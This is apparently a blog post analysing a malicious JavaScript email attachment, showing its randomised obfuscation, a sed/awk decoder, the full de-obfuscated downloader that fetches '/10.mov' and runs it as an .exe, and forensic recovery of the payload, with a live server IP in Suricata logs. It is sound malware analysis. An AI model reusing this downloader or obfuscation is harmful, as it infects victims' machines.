There’s a theory that a thousand monkeys typing away at a thousand typewriters will eventually reproduce the works of Shakespeare. I got home one day to find a JavaScript downloader semi-randomly creating dynamic functions until one of them worked and downloaded some malware that I hadn’t seen before.
Background
We’re all used to getting emails claiming to be an unpaid invoice, and I’m often busy doing something else (or too tired after a day’s work) to worry about most of them. For some reason though, I decided to have a look at this one and I’m glad I did as it turned out to be interesting and prompted me to add some functionality to my unpacking script (I really ought to come up with a better name for that).
The emails (I ended up receiving a few of them) were sent to an ‘info@’ email address that was mentioned on a web site and ended up being delivered straight to my inbox. They contained an attachment which was a zipped JavaScript file.
The JavaScript file was obviously obfuscated, but as I set out trying to manually de-obfuscate it, I noticed that it was dynamically creating a function by interspersing randomly selected fragments of JavaScript with static strings of JavaScript. It would then call this dynamically generated function.
The Math.random() call used to dynamically piece a string of JavaScript back together before executing it had me baffled at the time, although admittedly I was trying to watch TV at the same time — a combination which wasn’t working well — so I opted to run the JavaScript using Cuckoo instead.
The first time that I ran it, it downloaded a copy of the Cerber ransomware (or at least something claiming to be Cerber). I ran it again the next day, as a demonstration, and it downloaded a different piece of malware which I haven’t yet identified, and the analysis of which prompted me to add some more functionality to my unpacking script.
Just after starting this blog post, I had one of those ‘ah ha’ moments regarding the obfuscated JavaScript file, checked it out, and managed to de-obfuscate it so I’ll break this in to two parts: the first covering the JavaScript downloader; and the second covering the binary.
The JavaScript Attachment
Firstly, the email mentioned:
Please see the file that is attached.The file is password protected to protect your information. The password is 123456
This is obviously phoney because password protecting the file and then including the password on the next line isn’t going to ‘protect your information’. Plus it’s a simple password.
The de-obfuscation part of the JavaScript file dynamically creates a function:
[code autolinks=”false”]
ghrue=(new Function("kvaoa","qwori","ksgaj","var pqorq=kvaoa.match(/\\S{5}/g),ogwnh=\"\",ogwig=0;while(ogwig<pqorq.length){ogwnh+"+ogmwn()+"ng"+ogmwn()+"ode(p"+ogmwn()+"Int(pqorq[ogwig"+ogmwn()+"11);ogwig++;}eval(ogwnh);")(ogiwj,null,null));
[/code]
and then runs it. That function that it calls looks similar to this:
[code autolinks=”false”]
function ogmwn()
{
var wjtgs=new Array("-||&","].substr(3,2),16)^",".fromCharC","=Stri","arse","s{d{","d{fsgfg","<<J","_IE");
return wjgts[Math.floor(Math.random()*wjgts.length)];
}
[/code]
Now you can see why I was a tad foxed by this — how is a JavaScript function that contains four randomly selected string fragments possibly going to run?!
It turns out that I was focussing on the detail too much and missing the bigger picture. It came to me just after I started this blog post — what if it keeps generating that function until the random choices are such that the function is syntactically correct and runs? With that in mind, I went back and looked at the surrounding code:
[code autolinks=”false”]
var ienbc;
while (true) {
try {
ghrue = (new Function("kvaoa","qwori","ksgaj","var pqorq=kvaoa.match(/\\S{5}/g),ogwnh=\"\",ogwig=0;while(ogwig<pqorq.length){ogwnh+"+ogmwn()+"ng"+ogmwn()+"ode(p"+ogmwn()+"Int(pqorq[ogwig"+ogmwn()+"11);ogwig++;}eval(ogwnh);")(ogiwj,null,null));
break;
} catch(er) {
var a = 1;
}
}
return ghrue;
[/code]
and noticed that that is exactly what it is doing — it’s a simplified version of the thousand monkeys with a thousand typewriters.
If the randomly selected string fragments don’t generate a syntactically correct function on line 5, then an exception will be generated and control will be transferred to the catch() block, and since the condition in the while loop (‘true’) evaluates to true, the while loop will be executed again, dynamically generating another version of the function.
If, however, the randomly selected string fragments do generate a syntactically correct function, then program flow will continue to the break statement at line 6 which will exit the while(true) loop and the return statement will then run the newly generated function.
What we need to do now is determine what the correct version of the dynamically generated function is, by determining which of the string fragments from the array will syntactically fit in to the rest of the string to form the new function. This is reasonably easy because we can match ‘[‘ characters with ‘]’, and complete JavaScript function names such as fromCharCode():
[code autolinks=”false”]
var ienbc;
while (true) {
try {
ghrue = (new Function("kvaoa","qwori","ksgaj","var pqorq=kvaoa.match(/\\S{5}/g),ogwnh=\"\",ogwig=0;while(ogwig<pqorq.length){ogwnh+=String.fromCharCode(parseInt(pqorq[ogwig].substr(3,2),16)^11);ogwig++;}eval(ogwnh);")(ogiwj,null,null));
break;
} catch(er) {
var a = 1;
}
}
[/code]
… and making it a tad more readable:
[code autolinks=”false”]
var ienbc;
while (true) {
try {
ghrue = (new Function("kvaoa","qwori","ksgaj","
var pqorq = kvaoa.match(/\\S{5}/g);
var ogwnh = \"\";
var ogwig = 0;
while (ogwig < pqorq.length) {
ogwnh += String.fromCharCode(parseInt(pqorq[ogwig].substr(3,2),16)^11);
ogwig++;
}
eval(ogwnh);
")(ogiwj,null,null)
);
break;
}
catch(er)
{
var a = 1;
}
}
[/code]
We can now see how it is doing the de-obfuscation. The first parameter (the last two are unused) is first broken up in to multiple (‘g’) groups of five ‘{5}’ non-space (‘\S’) characters by the match() function in line 6. These groups are stored in the array pqorq.
The while loop in line 10 then iterates through each of the groups of five characters using ogwig as the index (‘ogwig < pqorq.length()’). For each of these groups, it takes the two character substring starting at offset 3 (‘.substr(3,2)’).
The two characters are then passed to parseInt(), using 16 as the radix (base) — in other words, convert a string of hex digits to an integer (‘parseInt(…,16)’). This value is then xored with 11 (‘^11’), before being converted to an ASCII character (‘String.fromCharCode(…)’) and appended to what will become the output string (‘ogwnh += …’).
Now that we have the de-obfuscation algorithm, we can script it in something like Python or, if you’re like me, sed and awk (although I just thought that if I actually do it in Python, then Windows users will stand more of a chance of being able to use it/follow along).
[code autolinks=”false”]
#!/bin/sh
sed ‘s/…\(..\)/\1/g’ hexstr.js |awk ‘
{
for (i = 1;i < length($0);i += 2) {
byte = substr($0,i,2);
dec = strtonum("0x" byte);
printf("%c",xor(dec,11));
}
}
‘
[/code]
Although I’m in two minds about that awk script as it uses strtonum() and xor(), which I don’t recall being in awk before, so I suspect that they may be GNU extensions rather than POSIX (and the man page confirms that).
I can remember strtonum() and xor() not being available in earlier versions of awk that I’ve used because I can remember having to write functions to both convert a hexadecimal string to an integer, and to xor two values together (it was before Python and I don’t like Perl). However, that was back when I had more spare time on my hands so for the sake of time (and because I can’t remember where I put my awk xor implementation) I’ve used the GNU functions in this script.
Right, back to the present, let’s have a look at how the script works. Oh, something that I didn’t include in here, for brevity, is the string of obfuscated JavaScript which we need to feed to the above Bourne shell (sed and awk combo) script.
The obfuscated JavaScript string was constructed using eight kvaoa += “…” statements. We need to remove all the JavaScript and concatenate just the string contents all on to one line before passing it to the script — I just did that the slow, boring, manual way using vi.
The initial sed command is doing a substitution (the sed ‘s///’ command) which is taking the place of the JavaScript match() and substr() combo by discarding all characters except for the last two (‘\(..\)’) in every (‘g’) group of five (‘…\(..\)’).
The ‘…’ followed by ‘\(..\)’ will match five characters in total, as ‘.’ matches any character. The escaped parenthesis (‘\(\)’) tell sed to remember the contents (in this case the last two out of five characters) so that we can refer to them in the substituted text (the right hand side of the ‘s’ command) using the \n (\1 in this case as there is only one set of parenthesis on the left side of the s command) construct. The trailing ‘g’ says to repeat this for every match, not just the first (the same as the ‘g’ in the JavaScript match() call) — if we left the ‘g’ out, we would only get the last two characters of the first group of five, not the last two characters of every group of five.
The sed command will thus output one long string (because I manually put all of the obfuscated JavaScript string on to one line) consisting of the last two characters of every group of five which, according to the original JavaScript, should be valid hex characters.
The awk script takes the long string of hex characters from sed and processes them two at a time (‘i += 2’) by taking the next two characters (‘substr($0,i,2)’), prepending ‘0x’ (‘”0x” byte’) to signify a hexadecimal value, and passing it to strtonum() to convert it to decimal. The decimal value is then xored with 11 (‘xor(dec,11)’) before being converted to an ASCII character using the printf() function with a format string of “%c”.
Now we get to the bit that you’ve been on the edge of your seat for — the output.
[code autolinks=”false”]
function getDataFromUrl(url, callback) {
try {
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlHttp.open("GET", url, false);
xmlHttp.send();
if (xmlHttp.status == 200) {
return callback(xmlHttp.ResponseBody, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
function getData(callback) {
try {
getDataFromUrl("http://ipaddr/10.mov", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://ipaddr/10.mov", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://ipaddr/10.mov", function(result, error) {
if (!error) {
return callback(result, false);
} else {
return callback(null, true);
}
});
}
});
}
});
} catch (error) {
return callback(null, true);
}
}
function getTempFilePath() {
try {
var fs = new ActiveXObject("Scripting.FileSystemObject");
var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
return tmpFilePath;
} catch (error) {
return false;
}
}
function saveToTemp(data, callback) {
try {
var path = getTempFilePath();
if (path) {
var objStream = new ActiveXObject("ADODB.Stream");
objStream.Open();
objStream.Type = 1;
objStream.Write(data);
objStream.Position = 0;
objStream.SaveToFile(path, 2);
objStream.Close();
return callback(path, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
getData(function (data, error) {
if (!error) {
saveToTemp(data, function (path, error) {
if (!error) {
try {
var wsh = new ActiveXObject("WScript.Shell");
wsh.Run(path);
} catch (error) {
}
}
});
}
});
[/code]
Granted, it didn’t come out looking like that — I have added white space to make it more readable. All the text, however, is the original text — it was nice of the author(s) to use meaningful function names.
The getDataFromUrl() function on line 1 simply uses an ActiveX xmlHttp object to download from the URL passed to the function in url. It calls the function passed to it in callback with the results of the download. The results will include the HTTP response body if the HTTP server returned the HTTP status code ‘200’.
getData() (line 18) looks convoluted but that is because it contains the same code nested to three levels deep, presumably to retry the download three times — why it doesn’t use a loop I don’t know (unless using a loop would break the ability to pass a function object to getDataFromUrl()). This function contains the URL from which the malicious binary is downloaded — I have removed the IP address that was in the original code, but the path (/10.mov) is the same as that in the original code.
getTempFilePath() on line 44 uses an ActiveX FileSystemObject object and Math.random() to generate a random floating point number between 0 and 1 (not including 1 — see the Math.random() documentation). This is then converted to a string representing a base 36 (26 letters of the alphabet plus 10 digits) number (‘.toString(36)’). It then appends ‘.exe’ to the 9 character substring starting from the third character (‘2’ with this index being zero based) of the result (‘.substr(2,9)’) to create a file name. The file name is appended to the %TMP% environment variable (‘GetSpecialFolder(2)’ — see the MSDN documentation for GetSpecialFolder()) to create the full path of the downloaded file (10.mov).
saveToTemp() on line 56 uses getTempFilePath() to generate a filespec (path + file name), followed by an ADODB.Stream ActiveX object to write the data to the temporary file. The ‘2’ in the SaveToFile() call specifies adSaveCreateOverWrite — that is, that the file should be created if it doesn’t already exist, or overwritten if it does (see the documentation for the SaveOptions parameter of SaveToFile()).
So, basically, the zipped JavaScript email attachment is dynamically generating a de-obfuscation function (presumably to thwart automated static analysis) which will download the specified URL (‘/10.mov’ from an HTTP server specified by an IP address which I’ve removed). The downloaded file is saved to a .exe file with a randomly generated name saved in the directory (folder) specified by the %TMP% environment variable.
The randomly generated file name is created by converting a random number of up to nine digits (it may always be nine digits, depending on how many decimal places Math.random() returns) to a base-36 number. This means that the randomly generated file name will be made up of letters and digits (alphanumeric characters) (base-36 uses the 10 digits that base-10 uses, plus the 26 letters of the alphabet — similarly to base-16 (hexadecimal) which uses the 10 digits plus the first 6 letters of the alphabet).
Recovering the Downloaded File
I then attempted to recover the downloaded file. My first attempt was to extract the file from a pcap file generated by Wireshark, as I was watching the network traffic from/to the Cuckoo virtual machine while I was running malware.
Using Wireshark and Suricata
Since I had started Wireshark capturing all packets from/to the Cuckoo virtual machine in which I was running the malware sample, I simply stopped the capture and saved all of the packets to a pcap file. I then modified Suricata‘s configuration to enable file-store:
[code autolinks=”false”]
– file-store:
enabled: yes # set to yes to enable
log-dir: files # directory to store the files
force-magic: no # force logging magic on all stored files
# force logging of checksums, available hash functions are md5,
# sha1 and sha256
#force-hash: [md5]
force-filestore: yes # force storing of all files
# override global stream-depth for sessions in which we want to
# perform file extraction. Set to 0 for unlimited.
#stream-depth: 0
#waldo: file.waldo # waldo file to store the file_id across runs
[/code]
… and file-log:
[code autolinks=”false”]# output module to log files tracked in a easily parsable json format
– file-log:
enabled: yes
filename: files-json.log
append: yes
#filetype: regular # ‘regular’, ‘unix_stream’ or ‘unix_dgram’
force-magic: no # force logging magic on all logged files
# force logging of checksums, available hash functions are md5,
# sha1 and sha256
#force-hash: [md5]
[/code]
Then ran Suricata. To do this, I made a subdirectory, changed in to it, then ran the following Suricata command:
[code autolinks=”false”]suricata -c /etc/suricata/suricata.yaml -l . -r ../unknown.pcap
[/code]
The -l option sets the default log directory, and I used this to override the /var/log/suricata/ log directory in the configuration file. This means that I can still run Suricata as a non-root user (just in case), without having to change the log directory in the configuration file and then change it back again, nor copy the configuration and change it.
The -r option specifies the pcap file to read from. The -c option specifies the configuration file to use.
We can then look for anything downloaded from /10.mov with the following command, in the Suricata log directory (which we set to ‘.’ with the -l option):
[code autolinks=”false”]
$ grep "10\.mov" *
eve.json:{"timestamp":"2017-01-05T18:44:14.746418+1100","flow_id":413914475649496,"pcap_cnt":75,"event_type":"alert","src_ip":"86.106.131.141","src_port":80,"dest_ip":"10.254.241.43","dest_port":1063,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2018959,"rev":2,"signature":"ET POLICY PE EXE or DLL Windows file download HTTP","category":"Potential Corporate Privacy Violation","severity":1},"http":{"hostname":"86.106.131.141","url":"\/10.mov","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)","http_content_type":"video\/quicktime","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":42333}}
eve.json:{"timestamp":"2017-01-05T18:44:15.434448+1100","flow_id":413914475649496,"pcap_cnt":147,"event_type":"http","src_ip":"10.254.241.43","src_port":1063,"dest_ip":"86.106.131.141","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"86.106.131.141","url":"\/10.mov","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)","http_content_type":"video\/quicktime","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103393}}
eve.json:{"timestamp":"2017-01-05T18:44:15.468951+1100","flow_id":413914475649496,"pcap_cnt":149,"event_type":"fileinfo","src_ip":"86.106.131.141","src_port":80,"dest_ip":"10.254.241.43","dest_port":1063,"proto":"TCP","http":{"hostname":"86.106.131.141","url":"\/10.mov","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)","http_content_type":"video\/quicktime","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106233},"app_proto":"http","fileinfo":{"filename":"\/10.mov","state":"TRUNCATED","stored":false,"size":2573,"tx_id":0}}
grep: files: Is a directory
files-json.log:{ "timestamp": "01\/05\/2017-18:44:15.468951", "pcap_pkt_num": 149, "ipver": 4, "srcip": "86.106.131.141", "dstip": "10.254.241.43", "protocol": 6, "sp": 80, "dp": 1063, "http_uri": "\/10.mov", "http_host": "86.106.131.141", "http_referer": "<unknown>", "http_user_agent": "Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)", "filename": "\/10.mov", "magic": "unknown", "state": "TRUNCATED", "stored": false, "size": 2573 }
[/code]
From this we can see that the file has been truncated (“state”: “TRUNCATED”) — we’ll need to come up with a different way of capturing the binary file.
The Forensics Approach
Another approach that we can try is to boot the virtual machine using a live Linux CDROM/DVD image, like Kali, mount the NTFS filesystem, and try and identify recently modified files. We know, from looking at the de-obfuscated JavaScript file and from looking at the pcap file, that the JavaScript requested /10.mov from an HTTP server. We also know, from looking at the response from the server, that although the file ends in .mov, and the returned Content-type: header was video/quicktime, the returned file was actually a Windows PE (portable executable) file because the returned content started with the characters MZ.
Knowing that the downloaded file was a Windows PE file, we can use the UNIX find command to look for recently modified files that are Windows PE files — this command assumes that you are running it less than 24 hours (‘-1’) after the malware was downloaded — modify the ‘-1’ parameter to the -mtime predicate if you need to go back further (the ‘-‘ says less than, and the number represents multiples of 24 hours, so ‘-mtime -1’ will match files whose mtime (last modified time) is less than 1 * 24 hours ago):
[code autolinks=”false”]
$ find . -type f -mtime -1 -exec file {} \; | grep "PE32"
./Documents and Settings/user/Application Data/itunes.exe: PE32 executable (GUI) Intel 80386, for MS Windows
./Documents and Settings/user/Local Settings/Temporary Internet Files/Content.IE5/H8T9VMND/10[1].mov: PE32 executable (GUI) Intel 80386, for MS Windows
[/code]
So it looks like the malware deleted itself (the temporary file that the de-obfuscated JavaScript downloaded 10.mov to) — we could use fls from Sleuthkit to look for deleted files:
[code autolinks=”false”]
fls -dFlr /dev/sda1 |grep "\.exe"
[/code]
- -d to only show deleted files
- -F to only show files (not directories)
- -l to use long listing format (similar to ‘ls -l’)
- -r to recurse in to directories
However, the find command showed 10.mov still sitting in the Internet Explorer cache (Temporary Internet Files/Content.IE5/) so we can just pull it from there. Let’s compare the hashes of 10.mov and itunes.exe to see if those files are actually the same, given that this is a Cuckoo virtual machine so there was very little activity except that generated by us running the malware (I certainly didn’t install iTunes):
[code autolinks=”false”]
$ md5sum -b Documents\ and\ Settings/user/Application\ Data/itunes.exe Documents\ and\ Settings/user/Local\ Settings/Temporary\ Internet\ Files/Content.IE5/H8T9VMND/10\[1\].mov
54bfe37e0c2b05f674a71c0859aa1974 *Documents and Settings/bobby/Application Data/itunes.exe
54bfe37e0c2b05f674a71c0859aa1974 *Documents and Settings/bobby/Local Settings/Temporary Internet Files/Content.IE5/H8T9VMND/10[1].mov
[/code]
It looks like those two files are the same file, suggesting that the malware which was downloaded and executed by the de-obfuscated JavaScript, saved a copy of itself to %APPDATA%\itunes.exe.
In part two I shall look at the downloaded binary file, which unpacks itself, runs anti-debugging checks (which I need to make my unpacking script survive), and appears to do something with Tor.